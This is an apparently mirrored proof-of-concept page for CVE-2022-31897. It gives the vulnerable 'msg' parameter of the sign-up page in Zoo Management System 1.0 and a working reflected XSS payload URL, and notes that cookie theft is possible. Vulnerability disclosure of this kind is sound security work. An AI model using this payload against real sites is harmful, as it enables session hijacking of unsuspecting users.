Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-31897 PoC — Zoo Management System 跨站脚本漏洞

Source
https://github.com/angelopioamirante/CVE-2022-31897
Associated Vulnerability
Title:Zoo Management System 跨站脚本漏洞 (CVE-2022-31897)
Description:SourceCodester Zoo Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via public_html/register_visitor?msg=.
Description
Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)
Readme
# CVE-2022-31897

# Date: 06/22/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Server: XAMPP on Windows 10 
# CVE: CVE-2022-31897

# Description:
Zoo Management System 1.0 is vulnerable to reflected cross-site scripting on the sign-up page. The "msg" parameter in 'http://localhost/public_html/register_visitor?msg=' is vulnerable.

# Impact:
An attacker could steal cookies with a crafted URL sent to the victims.

# Exploit:

Visit the following page: 

1. http://localhost/public_html/register_visitor?msg=<script>alert(window.navigator.userAgent)</script>

2. Alert pop up is fired!


# Image poc:

- [Registration page](https://ibb.co/8XKDgJX)
- [XSS](https://ibb.co/mTTmTmy)
File Snapshot

 [4.0K]  /data/pocs/cc85c64b7892f7c1abcd658c44c4d5da4a4b02ce
└── [ 868]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →